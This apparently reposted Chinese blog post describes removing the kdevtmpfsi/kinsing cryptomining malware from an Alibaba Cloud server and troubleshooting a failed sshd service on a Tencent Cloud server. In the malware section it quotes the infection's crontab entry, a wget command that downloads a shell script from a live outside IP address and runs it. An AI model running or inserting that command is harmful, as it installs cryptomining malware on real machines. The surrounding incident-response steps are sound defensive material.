說明

我有兩臺云服務器，一臺阿里的（買了1年），一臺騰訊的（買了3年），都是基本配置1核心2G內存（阿里云盤是40G騰訊的是50G），這幾天一直收到阿里云的短信說出現了緊急安全事件：惡意腳本代碼執行…

今天早上就登錄了阿里云服務器查看了一下top，發現 kdevtmpfsi 的進程 cup 占用快100%了，中招的朋友不少，解決方法如下【一共5個步驟】騰訊官方也有相關的 處理方法：

# 1.查看kdevtmpfsi的守護進程kinsing先kill掉【否則kdevtmpfsi進程會不斷恢復占用】 [root@aliyun ~]# ps -aux | grep kinsing # 2.查看kdevtmpfsi的進程并kill掉 [root@aliyun ~]# ps -aux | grep kdevtmpfsi # 3.刪除/tmp/下kdevtmpfsi相關文件 [root@aliyun ~]# cd /tmp/ [root@aliyun tmp]# rm -rf kdevtmpfsi # 4.刪除/var/tmp/下kinsing相關文件 [root@aliyun ~]# cd /var/tmp/ [root@aliyun tmp]# rm -rf kinsing # 5.查詢并刪除定時任務 # 查詢[root@aliyun ~]# crontab -l* * * * * wget -q -O - http://195.3.146.118/spr.sh | sh > /dev/null 2>&1# 編輯刪除 刪除全部定時任務 crontab -r[root@aliyun ~]# crontab -e

至此，阿里云的服務器問題解決，😢 誰知道，讓我哭的是騰訊的云服務器。昨天我還在測試Hadoop，今天使用ssh客戶端無法登錄，我一想，會不會也是這個病毒…【可惜不是 😳】

SSH無法連接問題排查

我先是上控制臺進行了實例的自助檢測，發現今天上午【連接數出現過達到上限的情況】：

ping了一下服務器，通了…

又確認了一下安全組，沒有問題啊…

進行了實例端口驗通，也是沒有問題…

然后使用騰訊云的控制臺登錄了服務器：

使用標準登錄方式【TCP:22】自然是無法登錄的，所以用的是VNC登錄：

登錄后發現hosts映射和hostname都已經被篡改了，隨后查看了 top 沒有發現異常，查看 crontab 也沒有異常，然后就剩 SSH 服務了：

## 查看服務狀態【處理時沒有截圖】這里復現一下，一直處在【activating(auto-restart)】 [root@VM-0-8-centos ~]# systemctl status sshd.service ● sshd.service - OpenSSH server daemonLoaded: loaded (/usr/lib/systemd/system/sshd.service; enabled; vendor preset: enabled)Active: activating(auto-restart) (Result: exit-code) since Fri 2021-08-20 13:38:56 CST; 7s agoDocs: man:sshd(8)man:sshd_config(5)Process: 31925 ExecStart=/usr/sbin/sshd -D $OPTIONS (code=exited, status=255)Main PID: 31925 (code=exited, status=255)Aug 20 13:38:41 VM-0-8-centos systemd[1]: sshd.service: main process exited, code=exited, status=255/n/a Aug 20 13:38:41 VM-0-8-centos systemd[1]: Failed to start OpenSSH server daemon. Aug 20 13:38:41 VM-0-8-centos systemd[1]: Unit sshd.service entered failed state. Aug 20 13:38:41 VM-0-8-centos systemd[1]: sshd.service failed. Aug 20 13:38:56 VM-0-8-centos systemd[1]: Stopped OpenSSH server daemon.# 查看報錯原因 [root@VM-0-8-centos ~]# sshd -t Missing privilege separation directory: /var/empty/sshd# 創建文件夾 [root@VM-0-8-centos ~]# mkdir -p /var/empty/sshd/etc # 時區設置 [root@VM-0-8-centos ~]# cd /var/empty/sshd/etc/ [root@VM-0-8-centos etc]# ln -s /etc/localtime localtime# 啟動ssh服務 [root@VM-0-8-centos etc]# systemctl start sshd.service # 再次查看狀態 [root@VM-0-8-centos etc]# systemctl status sshd.service ● sshd.service - OpenSSH server daemonLoaded: loaded (/usr/lib/systemd/system/sshd.service; enabled; vendor preset: enabled)Active: active (running) since Fri 2021-08-20 13:48:24 CST; 4min 7s agoDocs: man:sshd(8)man:sshd_config(5)Main PID: 1015 (sshd)CGroup: /system.slice/sshd.service├─1015 /usr/sbin/sshd -D├─1742 sshd: unknown [priv]└─1743 sshd: unknown [net]

啟動ssh服務成功，問題解決。

總結

😡 最終我也不知道為什么突然就無法訪問，沒有病毒木馬，沒有惡意連接。收獲是：排查問題要從源頭排查，剛開始沒有想到是SSH服務的問題，一直以為是端口護著TCP無法連接。【給大家一個建議，經常修改服務器登錄密碼。】 👌

總結

以上是生活随笔為你收集整理的【Linux环境】SSH突然无法连接【排查2个小时最终解决Failed to start OpenSSH server daemon】及【阿里云服务器的 kdevtmpfsi 挖矿病毒处理】的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。